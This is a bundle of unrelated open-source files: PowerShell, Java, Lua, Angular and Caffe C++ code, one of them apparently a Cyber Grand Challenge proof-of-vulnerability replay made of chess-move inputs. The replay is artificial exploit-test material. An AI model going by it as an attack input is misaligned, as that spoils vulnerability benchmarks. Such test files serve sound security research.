$now.Minute $Second.StrokeDashArray[0] = $Second.StrokeDashArray[1]/60 * $now.Second } # New-BootsGadget { # label "hh:mm" -fontsize 24 -Effect {DropShadowEffect -Color White -Shadow 0 -Blur 8} # } -Refresh "00:00:00.5" { # $this.Tag.Content.Content = Get-Date -f 'h:mm' # } -Title "Clock" -Topmost
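The weather widget above polls Yahoo's (long since retired) forecast RSS for a fixed WOEID and pulls the condition code, temperature, astronomy and forecast elements out of the XML. For reference, the same feed could be inspected from a shell as sketched below; this assumes the endpoint still answers, which it no longer does.

# Hypothetical inspection of the feed the widget parses; the endpoint is the one hard-coded
# above and has since been shut down by Yahoo, so this is illustrative only.
WOEID=14586
curl -s "http://weather.yahooapis.com/forecastrss?p=${WOEID}" \
  | grep -E 'yweather:(condition|astronomy|forecast)'   # the elements the widget reads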
{ "pile_set_name": "Github" }
package com.tencent.mm.plugin.exdevice.service; import com.tencent.matrix.trace.core.AppMethodBeat; import com.tencent.mm.plugin.exdevice.j.b; import com.tencent.mm.plugin.exdevice.service.k.a; import com.tencent.mm.sdk.platformtools.ab; public class w extends a { public void a(long j, int i, int i2, int i3, long j2) { AppMethodBeat.i(19632); ab.i("MicroMsg.exdevice.OnStateChangeCallBack", "onStateChange, deviceId = %s, oldSate = %d, newState = %d, errCode = %d, profileType = %d", b.ie(j), Integer.valueOf(i), Integer.valueOf(i2), Integer.valueOf(i3), Long.valueOf(j2)); AppMethodBeat.o(19632); } }
{ "pile_set_name": "Github" }
--[[============================================================================ main.lua ============================================================================]]-- --[[-- # xRules xRules lets you rewrite and transform incoming MIDI/OSC messages on-the-fly, using a visual programming interface. Outgoing messages can be routed into Renoise, or passed on to external devices. ## Links Renoise: [Tool page](http://www.renoise.com/tools/xrules/) Renoise Forum: [Feedback and bugs](http://forum.renoise.com/index.php/topic/47224-new-tool-31-xrules/) Github: [Documentation and source](https://github.com/renoise/xrnx/blob/master/Tools/com.renoise.xRules.xrnx/) --]] --============================================================================== _trace_filters = nil --_trace_filters = {".*"} --_trace_filters = {"^xRule*"} _clibroot = "source/cLib/classes/" _xlibroot = "source/xLib/classes/" _vlibroot = "source/vLib/classes/" _vlib_img = _vlibroot .. "images/" require (_clibroot.."cLib") require (_clibroot.."cDebug") require (_clibroot.."cFilesystem") require (_clibroot.."cDocument") require (_clibroot.."cSandbox") require (_clibroot.."cReflection") require (_clibroot.."cObservable") require (_clibroot.."cPreferences") require (_clibroot.."cParseXML") require (_clibroot.."cString") cLib.require (_xlibroot.."xLib") cLib.require (_xlibroot.."xAudioDevice") cLib.require (_xlibroot.."xAutomation") cLib.require (_xlibroot.."xMessage") cLib.require (_xlibroot.."xValue") cLib.require (_xlibroot.."xMidiMessage") cLib.require (_xlibroot.."xMidiInput") cLib.require (_xlibroot.."xOscRouter") cLib.require (_xlibroot.."xOscPattern") cLib.require (_xlibroot.."xOscMessage") cLib.require (_xlibroot.."xOscValue") cLib.require (_xlibroot.."xOscClient") cLib.require (_xlibroot.."xOscDevice") cLib.require (_xlibroot.."xNoteColumn") cLib.require (_xlibroot.."xTrack") cLib.require (_xlibroot.."xTransport") cLib.require (_xlibroot.."xBlockLoop") cLib.require (_xlibroot.."xSongPos") cLib.require (_xlibroot.."xPlayPos") cLib.require (_xlibroot.."xParameter") cLib.require (_xlibroot.."xPhraseManager") cLib.require (_xlibroot.."xRule") cLib.require (_xlibroot.."xRuleset") cLib.require (_xlibroot.."xRules") cLib.require (_xlibroot.."xScale") require (_vlibroot.."vLib") require (_vlibroot.."vTable") require (_vlibroot.."vLogView") require (_vlibroot.."vPrompt") require (_vlibroot.."vDialog") require (_vlibroot.."vArrowButton") require (_vlibroot.."vDialogWizard") require (_vlibroot.."vFileBrowser") --require (_vlibroot.."helpers/vVector") require "source/xRulesApp" require "source/xRulesAppPrefs" require "source/xRulesUI" require "source/xRulesUIAction" require "source/xRulesUICondition" require "source/xRulesUIEditor" require "source/xRulesAppDialogCreate" require "source/xRulesAppDialogExport" require "source/xRulesAppDialogPrefs" require "source/xRulesAppDialogHelp" -------------------------------------------------------------------------------- -- main -------------------------------------------------------------------------------- rns = nil app = nil -- pre-launch configuration local preferences = xRulesAppPrefs() --renoise.tool().preferences = preferences local cprefs = cPreferences{ tool_name = "xRules", doc_class_name = "xRulesAppPrefs", } local launch_with_profile = function(doc) renoise.tool().preferences = doc app = xRulesApp(cprefs) end local show_dialog = function() if app then app:show_dialog() else cprefs.launch_callback = function(doc) launch_with_profile(doc) app:show_dialog() end cprefs.default_callback = 
function() renoise.tool().preferences = preferences app = xRulesApp(cprefs) app:show_dialog() end cprefs:attempt_launch() end end local launch = function() if app then app:launch() else cprefs.launch_callback = function(doc) --print(">>> launch_callback (launch)...") launch_with_profile(doc) app:launch() end cprefs.default_callback = function() renoise.tool().preferences = preferences app = xRulesApp(cprefs) app:launch() end cprefs:attempt_launch() end end -------------------------------------------------------------------------------- -- menu entries -------------------------------------------------------------------------------- renoise.tool():add_menu_entry { name = "Main Menu:Tools:xRules", invoke = function() show_dialog() end } -------------------------------------------------------------------------------- -- keybindings -------------------------------------------------------------------------------- renoise.tool():add_keybinding { name = "Global:xRules:Show Dialog...", invoke = function(repeated) if (not repeated) then app:show_dialog() end end } -------------------------------------------------------------------------------- -- notifications -------------------------------------------------------------------------------- -- show/run application once renoise is ready -- (workaround for http://goo.gl/UnSDnw) local waiting_to_show_dialog = true local function app_idle_notifier() if waiting_to_show_dialog and renoise.song() then rns = renoise.song() waiting_to_show_dialog = false if preferences.autorun_enabled.value then launch() end if preferences.show_on_startup.value then show_dialog() end renoise.tool().app_idle_observable:remove_notifier(app_idle_notifier) end end renoise.tool().app_idle_observable:add_notifier(app_idle_notifier) renoise.tool().app_new_document_observable:add_notifier(function() --print(">>> app_new_document_observable fired...",rns,renoise.song()) rns = renoise.song() end) renoise.tool().app_release_document_observable:add_notifier(function() --print(">>> app_release_document_observable fired...",rns,renoise.song()) rns = renoise.song() end)
{ "pile_set_name": "Github" }
<?xml version="1.0" standalone="no" ?> <!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd"> <pov> <cbid>service</cbid> <replay> <write><data>new\x0a</data></write> <write><data>sd 1\x0a</data></write> <write><data>s1r3\x0a</data></write> <read><delim>\x0a</delim><match><data>move p7p5\x0a</data></match></read> <write><data>t1s1\x0a</data></write> <read><delim>\x0a</delim><match><data>move p8p6\x0a</data></match></read> <write><data>r3p4\x0a</data></write> <read><delim>\x0a</delim><match><data>move p6t2\x0a</data></match></read> <write><data>p4r3\x0a</data></write> <read><delim>\x0a</delim><match><data>move t2r4\x0a</data></match></read> <write><data>s2s4\x0a</data></write> <read><delim>\x0a</delim><match><data>move o8s4\x0a</data></match></read> <write><data>sd 1\x0a</data></write> <write><data>s1s3\x0a</data></write> <read><delim>\x0a</delim><match><data>move r4o4\x0a</data></match></read> <write><data>s3s1\x0a</data></write> <read><delim>\x0a</delim><match><data>move s4r3\x0a</data></match></read> <write><data>s1s7\x0a</data></write> <read><delim>\x0a</delim><match><data>move r8s7\x0a</data></match></read> <write><data>n1o3\x0a</data></write> <read><delim>\x0a</delim><match><data>move r3s4\x0a</data></match></read> <write><data>o3m4\x0a</data></write> <read><delim>\x0a</delim><match><data>move o4m4\x0a</data></match></read> <write><data>r1t3\x0a</data></write> <read><delim>\x0a</delim><match><data>move s4t3\x0a</data></match></read> <write><data>r2r4\x0a</data></write> <read><delim>\x0a</delim><match><data>move m4r4\x0a</data></match></read> <write><data>p2p3\x0a</data></write> <read><delim>\x0a</delim><match><data>move r4s3\x0a</data></match></read> <write><data>q1p2\x0a</data></write> <read><delim>\x0a</delim><match><data>move n8m6\x0a</data></match></read> <write><data>p1q1\x0a</data></write> <read><delim>\x0a</delim><match><data>move s7q5\x0a</data></match></read> <write><data>quit\x0a</data></write> <read><delim>\x0a</delim><match><data>bye\x0a</data></match></read> </replay> </pov>
{ "pile_set_name": "Github" }
export * from './tabs.module'; export * from './tabs.service'; export * from './tab-list.component'; export * from './tab/tab-panel.component'; export * from './tab-item/tab-item.directive'; export * from './tab-link/tab-link.directive'; export * from './tab-nav/tab-nav.component'; export * from './tab-utils/tab-directives';
{ "pile_set_name": "Github" }
package org.apache.helix.manager.zk.client; /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /** * Deprecated; please use DedicatedZkClientFactory in zookeeper-api instead. * * Singleton factory that build dedicated clients using the raw ZkClient. */ @Deprecated public class DedicatedZkClientFactory extends org.apache.helix.zookeeper.impl.factory.DedicatedZkClientFactory { }
{ "pile_set_name": "Github" }
#include <google/protobuf/io/coded_stream.h> #include <google/protobuf/io/zero_copy_stream_impl.h> #include <google/protobuf/text_format.h> #include <boost/filesystem.hpp> #include <map> #include <string> #include "caffe/common.hpp" #include "caffe/proto/caffe.pb.h" #include "caffe/util/io.hpp" #include "caffe/util/upgrade_proto.hpp" namespace caffe { bool NetNeedsUpgrade(const NetParameter& net_param) { return NetNeedsV0ToV1Upgrade(net_param) || NetNeedsV1ToV2Upgrade(net_param) || NetNeedsDataUpgrade(net_param) || NetNeedsInputUpgrade(net_param) || NetNeedsBatchNormUpgrade(net_param); } bool UpgradeNetAsNeeded(const string& param_file, NetParameter* param) { bool success = true; if (NetNeedsV0ToV1Upgrade(*param)) { // NetParameter was specified using the old style (V0LayerParameter); try to // upgrade it. LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "V0LayerParameter: " << param_file; NetParameter original_param(*param); if (!UpgradeV0Net(original_param, param)) { success = false; LOG(ERROR) << "Warning: had one or more problems upgrading " << "V0NetParameter to NetParameter (see above); continuing anyway."; } else { LOG(INFO) << "Successfully upgraded file specified using deprecated " << "V0LayerParameter"; } LOG(WARNING) << "Note that future Caffe releases will not support " << "V0NetParameter; use ./build/tools/upgrade_net_proto_text for " << "prototxt and ./build/tools/upgrade_net_proto_binary for model " << "weights upgrade this and any other net protos to the new format."; } // NetParameter uses old style data transformation fields; try to upgrade it. if (NetNeedsDataUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "transformation parameters: " << param_file; UpgradeNetDataTransformation(param); LOG(INFO) << "Successfully upgraded file specified using deprecated " << "data transformation parameters."; LOG(WARNING) << "Note that future Caffe releases will only support " << "transform_param messages for transformation fields."; } if (NetNeedsV1ToV2Upgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "V1LayerParameter: " << param_file; NetParameter original_param(*param); if (!UpgradeV1Net(original_param, param)) { success = false; LOG(ERROR) << "Warning: had one or more problems upgrading " << "V1LayerParameter (see above); continuing anyway."; } else { LOG(INFO) << "Successfully upgraded file specified using deprecated " << "V1LayerParameter"; } } // NetParameter uses old style input fields; try to upgrade it. if (NetNeedsInputUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "input fields: " << param_file; UpgradeNetInput(param); LOG(INFO) << "Successfully upgraded file specified using deprecated " << "input fields."; LOG(WARNING) << "Note that future Caffe releases will only support " << "input layers and not input fields."; } // NetParameter uses old style batch norm layers; try to upgrade it. 
if (NetNeedsBatchNormUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade batch norm layers using deprecated " << "params: " << param_file; UpgradeNetBatchNorm(param); LOG(INFO) << "Successfully upgraded batch norm layers using deprecated " << "params."; } return success; } void ReadNetParamsFromTextFileOrDie(const string& param_file, NetParameter* param) { CHECK(ReadProtoFromTextFile(param_file, param)) << "Failed to parse NetParameter file: " << param_file; UpgradeNetAsNeeded(param_file, param); } void ReadNetParamsFromBinaryFileOrDie(const string& param_file, NetParameter* param) { CHECK(ReadProtoFromBinaryFile(param_file, param)) << "Failed to parse NetParameter file: " << param_file; UpgradeNetAsNeeded(param_file, param); } bool NetNeedsV0ToV1Upgrade(const NetParameter& net_param) { for (int i = 0; i < net_param.layers_size(); ++i) { if (net_param.layers(i).has_layer()) { return true; } } return false; } bool NetNeedsV1ToV2Upgrade(const NetParameter& net_param) { return net_param.layers_size() > 0; } bool UpgradeV0Net(const NetParameter& v0_net_param_padding_layers, NetParameter* net_param) { // First upgrade padding layers to padded conv layers. NetParameter v0_net_param; UpgradeV0PaddingLayers(v0_net_param_padding_layers, &v0_net_param); // Now upgrade layer parameters. bool is_fully_compatible = true; net_param->Clear(); if (v0_net_param.has_name()) { net_param->set_name(v0_net_param.name()); } for (int i = 0; i < v0_net_param.layers_size(); ++i) { is_fully_compatible &= UpgradeV0LayerParameter(v0_net_param.layers(i), net_param->add_layers()); } for (int i = 0; i < v0_net_param.input_size(); ++i) { net_param->add_input(v0_net_param.input(i)); } for (int i = 0; i < v0_net_param.input_dim_size(); ++i) { net_param->add_input_dim(v0_net_param.input_dim(i)); } if (v0_net_param.has_force_backward()) { net_param->set_force_backward(v0_net_param.force_backward()); } return is_fully_compatible; } void UpgradeV0PaddingLayers(const NetParameter& param, NetParameter* param_upgraded_pad) { // Copy everything other than the layers from the original param. param_upgraded_pad->Clear(); param_upgraded_pad->CopyFrom(param); param_upgraded_pad->clear_layers(); // Figure out which layer each bottom blob comes from. map<string, int> blob_name_to_last_top_idx; for (int i = 0; i < param.input_size(); ++i) { const string& blob_name = param.input(i); blob_name_to_last_top_idx[blob_name] = -1; } for (int i = 0; i < param.layers_size(); ++i) { const V1LayerParameter& layer_connection = param.layers(i); const V0LayerParameter& layer_param = layer_connection.layer(); // Add the layer to the new net, unless it's a padding layer. if (layer_param.type() != "padding") { param_upgraded_pad->add_layers()->CopyFrom(layer_connection); } for (int j = 0; j < layer_connection.bottom_size(); ++j) { const string& blob_name = layer_connection.bottom(j); if (blob_name_to_last_top_idx.find(blob_name) == blob_name_to_last_top_idx.end()) { LOG(FATAL) << "Unknown blob input " << blob_name << " to layer " << j; } const int top_idx = blob_name_to_last_top_idx[blob_name]; if (top_idx == -1) { continue; } const V1LayerParameter& source_layer = param.layers(top_idx); if (source_layer.layer().type() == "padding") { // This layer has a padding layer as input -- check that it is a conv // layer or a pooling layer and takes only one input. Also check that // the padding layer input has only one input and one output. Other // cases have undefined behavior in Caffe. 
CHECK((layer_param.type() == "conv") || (layer_param.type() == "pool")) << "Padding layer input to " "non-convolutional / non-pooling layer type " << layer_param.type(); CHECK_EQ(layer_connection.bottom_size(), 1) << "Conv Layer takes a single blob as input."; CHECK_EQ(source_layer.bottom_size(), 1) << "Padding Layer takes a single blob as input."; CHECK_EQ(source_layer.top_size(), 1) << "Padding Layer produces a single blob as output."; int layer_index = param_upgraded_pad->layers_size() - 1; param_upgraded_pad->mutable_layers(layer_index)->mutable_layer() ->set_pad(source_layer.layer().pad()); param_upgraded_pad->mutable_layers(layer_index) ->set_bottom(j, source_layer.bottom(0)); } } for (int j = 0; j < layer_connection.top_size(); ++j) { const string& blob_name = layer_connection.top(j); blob_name_to_last_top_idx[blob_name] = i; } } } bool UpgradeV0LayerParameter(const V1LayerParameter& v0_layer_connection, V1LayerParameter* layer_param) { bool is_fully_compatible = true; layer_param->Clear(); for (int i = 0; i < v0_layer_connection.bottom_size(); ++i) { layer_param->add_bottom(v0_layer_connection.bottom(i)); } for (int i = 0; i < v0_layer_connection.top_size(); ++i) { layer_param->add_top(v0_layer_connection.top(i)); } if (v0_layer_connection.has_layer()) { const V0LayerParameter& v0_layer_param = v0_layer_connection.layer(); if (v0_layer_param.has_name()) { layer_param->set_name(v0_layer_param.name()); } const string& type = v0_layer_param.type(); if (v0_layer_param.has_type()) { layer_param->set_type(UpgradeV0LayerType(type)); } for (int i = 0; i < v0_layer_param.blobs_size(); ++i) { layer_param->add_blobs()->CopyFrom(v0_layer_param.blobs(i)); } for (int i = 0; i < v0_layer_param.blobs_lr_size(); ++i) { layer_param->add_blobs_lr(v0_layer_param.blobs_lr(i)); } for (int i = 0; i < v0_layer_param.weight_decay_size(); ++i) { layer_param->add_weight_decay(v0_layer_param.weight_decay(i)); } if (v0_layer_param.has_num_output()) { if (type == "conv") { layer_param->mutable_convolution_param()->set_num_output( v0_layer_param.num_output()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()->set_num_output( v0_layer_param.num_output()); } else { LOG(ERROR) << "Unknown parameter num_output for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_biasterm()) { if (type == "conv") { layer_param->mutable_convolution_param()->set_bias_term( v0_layer_param.biasterm()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()->set_bias_term( v0_layer_param.biasterm()); } else { LOG(ERROR) << "Unknown parameter biasterm for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_weight_filler()) { if (type == "conv") { layer_param->mutable_convolution_param()-> mutable_weight_filler()->CopyFrom(v0_layer_param.weight_filler()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()-> mutable_weight_filler()->CopyFrom(v0_layer_param.weight_filler()); } else { LOG(ERROR) << "Unknown parameter weight_filler for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_bias_filler()) { if (type == "conv") { layer_param->mutable_convolution_param()-> mutable_bias_filler()->CopyFrom(v0_layer_param.bias_filler()); } else if (type == "innerproduct") { layer_param->mutable_inner_product_param()-> mutable_bias_filler()->CopyFrom(v0_layer_param.bias_filler()); } else { LOG(ERROR) << "Unknown parameter bias_filler for layer type " << type; is_fully_compatible = false; } } 
if (v0_layer_param.has_pad()) { if (type == "conv") { layer_param->mutable_convolution_param()->add_pad(v0_layer_param.pad()); } else if (type == "pool") { layer_param->mutable_pooling_param()->set_pad(v0_layer_param.pad()); } else { LOG(ERROR) << "Unknown parameter pad for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_kernelsize()) { if (type == "conv") { layer_param->mutable_convolution_param()->add_kernel_size( v0_layer_param.kernelsize()); } else if (type == "pool") { layer_param->mutable_pooling_param()->set_kernel_size( v0_layer_param.kernelsize()); } else { LOG(ERROR) << "Unknown parameter kernelsize for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_group()) { if (type == "conv") { layer_param->mutable_convolution_param()->set_group( v0_layer_param.group()); } else { LOG(ERROR) << "Unknown parameter group for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_stride()) { if (type == "conv") { layer_param->mutable_convolution_param()->add_stride( v0_layer_param.stride()); } else if (type == "pool") { layer_param->mutable_pooling_param()->set_stride( v0_layer_param.stride()); } else { LOG(ERROR) << "Unknown parameter stride for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_pool()) { if (type == "pool") { V0LayerParameter_PoolMethod pool = v0_layer_param.pool(); switch (pool) { case V0LayerParameter_PoolMethod_MAX: layer_param->mutable_pooling_param()->set_pool( PoolingParameter_PoolMethod_MAX); break; case V0LayerParameter_PoolMethod_AVE: layer_param->mutable_pooling_param()->set_pool( PoolingParameter_PoolMethod_AVE); break; case V0LayerParameter_PoolMethod_STOCHASTIC: layer_param->mutable_pooling_param()->set_pool( PoolingParameter_PoolMethod_STOCHASTIC); break; default: LOG(ERROR) << "Unknown pool method " << pool; is_fully_compatible = false; } } else { LOG(ERROR) << "Unknown parameter pool for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_dropout_ratio()) { if (type == "dropout") { layer_param->mutable_dropout_param()->set_dropout_ratio( v0_layer_param.dropout_ratio()); } else { LOG(ERROR) << "Unknown parameter dropout_ratio for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_local_size()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_local_size( v0_layer_param.local_size()); } else { LOG(ERROR) << "Unknown parameter local_size for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_alpha()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_alpha(v0_layer_param.alpha()); } else { LOG(ERROR) << "Unknown parameter alpha for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_beta()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_beta(v0_layer_param.beta()); } else { LOG(ERROR) << "Unknown parameter beta for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_k()) { if (type == "lrn") { layer_param->mutable_lrn_param()->set_k(v0_layer_param.k()); } else { LOG(ERROR) << "Unknown parameter k for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_source()) { if (type == "data") { layer_param->mutable_data_param()->set_source(v0_layer_param.source()); } else if (type == "hdf5_data") { layer_param->mutable_hdf5_data_param()->set_source( v0_layer_param.source()); } else if (type == "images") { layer_param->mutable_image_data_param()->set_source( 
v0_layer_param.source()); } else if (type == "window_data") { layer_param->mutable_window_data_param()->set_source( v0_layer_param.source()); } else if (type == "infogain_loss") { layer_param->mutable_infogain_loss_param()->set_source( v0_layer_param.source()); } else { LOG(ERROR) << "Unknown parameter source for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_scale()) { layer_param->mutable_transform_param()-> set_scale(v0_layer_param.scale()); } if (v0_layer_param.has_meanfile()) { layer_param->mutable_transform_param()-> set_mean_file(v0_layer_param.meanfile()); } if (v0_layer_param.has_batchsize()) { if (type == "data") { layer_param->mutable_data_param()->set_batch_size( v0_layer_param.batchsize()); } else if (type == "hdf5_data") { layer_param->mutable_hdf5_data_param()->set_batch_size( v0_layer_param.batchsize()); } else if (type == "images") { layer_param->mutable_image_data_param()->set_batch_size( v0_layer_param.batchsize()); } else if (type == "window_data") { layer_param->mutable_window_data_param()->set_batch_size( v0_layer_param.batchsize()); } else { LOG(ERROR) << "Unknown parameter batchsize for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_cropsize()) { layer_param->mutable_transform_param()-> set_crop_size(v0_layer_param.cropsize()); } if (v0_layer_param.has_mirror()) { layer_param->mutable_transform_param()-> set_mirror(v0_layer_param.mirror()); } if (v0_layer_param.has_rand_skip()) { if (type == "data") { layer_param->mutable_data_param()->set_rand_skip( v0_layer_param.rand_skip()); } else if (type == "images") { layer_param->mutable_image_data_param()->set_rand_skip( v0_layer_param.rand_skip()); } else { LOG(ERROR) << "Unknown parameter rand_skip for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_shuffle_images()) { if (type == "images") { layer_param->mutable_image_data_param()->set_shuffle( v0_layer_param.shuffle_images()); } else { LOG(ERROR) << "Unknown parameter shuffle for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_new_height()) { if (type == "images") { layer_param->mutable_image_data_param()->set_new_height( v0_layer_param.new_height()); } else { LOG(ERROR) << "Unknown parameter new_height for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_new_width()) { if (type == "images") { layer_param->mutable_image_data_param()->set_new_width( v0_layer_param.new_width()); } else { LOG(ERROR) << "Unknown parameter new_width for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_concat_dim()) { if (type == "concat") { layer_param->mutable_concat_param()->set_concat_dim( v0_layer_param.concat_dim()); } else { LOG(ERROR) << "Unknown parameter concat_dim for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_fg_threshold()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_fg_threshold( v0_layer_param.det_fg_threshold()); } else { LOG(ERROR) << "Unknown parameter det_fg_threshold for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_bg_threshold()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_bg_threshold( v0_layer_param.det_bg_threshold()); } else { LOG(ERROR) << "Unknown parameter det_bg_threshold for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_fg_fraction()) { if (type == "window_data") { 
layer_param->mutable_window_data_param()->set_fg_fraction( v0_layer_param.det_fg_fraction()); } else { LOG(ERROR) << "Unknown parameter det_fg_fraction for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_context_pad()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_context_pad( v0_layer_param.det_context_pad()); } else { LOG(ERROR) << "Unknown parameter det_context_pad for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_det_crop_mode()) { if (type == "window_data") { layer_param->mutable_window_data_param()->set_crop_mode( v0_layer_param.det_crop_mode()); } else { LOG(ERROR) << "Unknown parameter det_crop_mode for layer type " << type; is_fully_compatible = false; } } if (v0_layer_param.has_hdf5_output_param()) { if (type == "hdf5_output") { layer_param->mutable_hdf5_output_param()->CopyFrom( v0_layer_param.hdf5_output_param()); } else { LOG(ERROR) << "Unknown parameter hdf5_output_param for layer type " << type; is_fully_compatible = false; } } } return is_fully_compatible; } V1LayerParameter_LayerType UpgradeV0LayerType(const string& type) { if (type == "accuracy") { return V1LayerParameter_LayerType_ACCURACY; } else if (type == "bnll") { return V1LayerParameter_LayerType_BNLL; } else if (type == "concat") { return V1LayerParameter_LayerType_CONCAT; } else if (type == "conv") { return V1LayerParameter_LayerType_CONVOLUTION; } else if (type == "data") { return V1LayerParameter_LayerType_DATA; } else if (type == "dropout") { return V1LayerParameter_LayerType_DROPOUT; } else if (type == "euclidean_loss") { return V1LayerParameter_LayerType_EUCLIDEAN_LOSS; } else if (type == "flatten") { return V1LayerParameter_LayerType_FLATTEN; } else if (type == "hdf5_data") { return V1LayerParameter_LayerType_HDF5_DATA; } else if (type == "hdf5_output") { return V1LayerParameter_LayerType_HDF5_OUTPUT; } else if (type == "im2col") { return V1LayerParameter_LayerType_IM2COL; } else if (type == "images") { return V1LayerParameter_LayerType_IMAGE_DATA; } else if (type == "infogain_loss") { return V1LayerParameter_LayerType_INFOGAIN_LOSS; } else if (type == "innerproduct") { return V1LayerParameter_LayerType_INNER_PRODUCT; } else if (type == "lrn") { return V1LayerParameter_LayerType_LRN; } else if (type == "multinomial_logistic_loss") { return V1LayerParameter_LayerType_MULTINOMIAL_LOGISTIC_LOSS; } else if (type == "pool") { return V1LayerParameter_LayerType_POOLING; } else if (type == "relu") { return V1LayerParameter_LayerType_RELU; } else if (type == "sigmoid") { return V1LayerParameter_LayerType_SIGMOID; } else if (type == "softmax") { return V1LayerParameter_LayerType_SOFTMAX; } else if (type == "softmax_loss") { return V1LayerParameter_LayerType_SOFTMAX_LOSS; } else if (type == "split") { return V1LayerParameter_LayerType_SPLIT; } else if (type == "tanh") { return V1LayerParameter_LayerType_TANH; } else if (type == "window_data") { return V1LayerParameter_LayerType_WINDOW_DATA; } else { LOG(FATAL) << "Unknown layer name: " << type; return V1LayerParameter_LayerType_NONE; } } bool NetNeedsDataUpgrade(const NetParameter& net_param) { for (int i = 0; i < net_param.layers_size(); ++i) { if (net_param.layers(i).type() == V1LayerParameter_LayerType_DATA) { DataParameter layer_param = net_param.layers(i).data_param(); if (layer_param.has_scale()) { return true; } if (layer_param.has_mean_file()) { return true; } if (layer_param.has_crop_size()) { return true; } if (layer_param.has_mirror()) { return true; } } if 
(net_param.layers(i).type() == V1LayerParameter_LayerType_IMAGE_DATA) { ImageDataParameter layer_param = net_param.layers(i).image_data_param(); if (layer_param.has_scale()) { return true; } if (layer_param.has_mean_file()) { return true; } if (layer_param.has_crop_size()) { return true; } if (layer_param.has_mirror()) { return true; } } if (net_param.layers(i).type() == V1LayerParameter_LayerType_WINDOW_DATA) { WindowDataParameter layer_param = net_param.layers(i).window_data_param(); if (layer_param.has_scale()) { return true; } if (layer_param.has_mean_file()) { return true; } if (layer_param.has_crop_size()) { return true; } if (layer_param.has_mirror()) { return true; } } } return false; } #define CONVERT_LAYER_TRANSFORM_PARAM(TYPE, Name, param_name) \ do { \ if (net_param->layers(i).type() == V1LayerParameter_LayerType_##TYPE) { \ Name##Parameter* layer_param = \ net_param->mutable_layers(i)->mutable_##param_name##_param(); \ TransformationParameter* transform_param = \ net_param->mutable_layers(i)->mutable_transform_param(); \ if (layer_param->has_scale()) { \ transform_param->set_scale(layer_param->scale()); \ layer_param->clear_scale(); \ } \ if (layer_param->has_mean_file()) { \ transform_param->set_mean_file(layer_param->mean_file()); \ layer_param->clear_mean_file(); \ } \ if (layer_param->has_crop_size()) { \ transform_param->set_crop_size(layer_param->crop_size()); \ layer_param->clear_crop_size(); \ } \ if (layer_param->has_mirror()) { \ transform_param->set_mirror(layer_param->mirror()); \ layer_param->clear_mirror(); \ } \ } \ } while (0) void UpgradeNetDataTransformation(NetParameter* net_param) { for (int i = 0; i < net_param->layers_size(); ++i) { CONVERT_LAYER_TRANSFORM_PARAM(DATA, Data, data); CONVERT_LAYER_TRANSFORM_PARAM(IMAGE_DATA, ImageData, image_data); CONVERT_LAYER_TRANSFORM_PARAM(WINDOW_DATA, WindowData, window_data); } } bool UpgradeV1Net(const NetParameter& v1_net_param, NetParameter* net_param) { if (v1_net_param.layer_size() > 0) { LOG(FATAL) << "Refusing to upgrade inconsistent NetParameter input; " << "the definition includes both 'layer' and 'layers' fields. " << "The current format defines 'layer' fields with string type like " << "layer { type: 'Layer' ... } and not layers { type: LAYER ... }. 
